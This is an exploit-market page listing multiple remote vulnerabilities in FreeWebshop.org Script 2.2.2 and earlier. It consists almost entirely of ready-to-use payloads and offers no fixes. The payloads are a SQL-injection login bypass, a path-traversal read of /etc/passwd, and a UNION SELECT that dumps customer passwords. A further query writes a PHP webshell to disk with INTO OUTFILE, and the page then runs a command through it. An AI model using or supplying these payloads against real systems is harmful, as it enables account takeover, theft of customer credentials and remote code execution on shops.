[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities

Author
Spiked
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1105
Category
web applications
Date add
02-11-2006
Platform
unsorted
===============================================================
FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities
===============================================================



Product: www.freewebshop.org
Version: 2.2.x, maybe lower
Critical Lvl : Highly critical
Where : From Remote
Exploits:

Bypass Login:
username:admin
password:' or 'a'='a

Read Files:
/index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00

List Passwords:
/index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer

Path Disclosure:
/index.php?page=info&action=../../1337inexistant

Create Files (needs Path Disclosure):
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'
/langs/uk/fork.php?cmd=ls


Discovered by Spiked and anonymous.



#  0day.today [2024-07-05]  #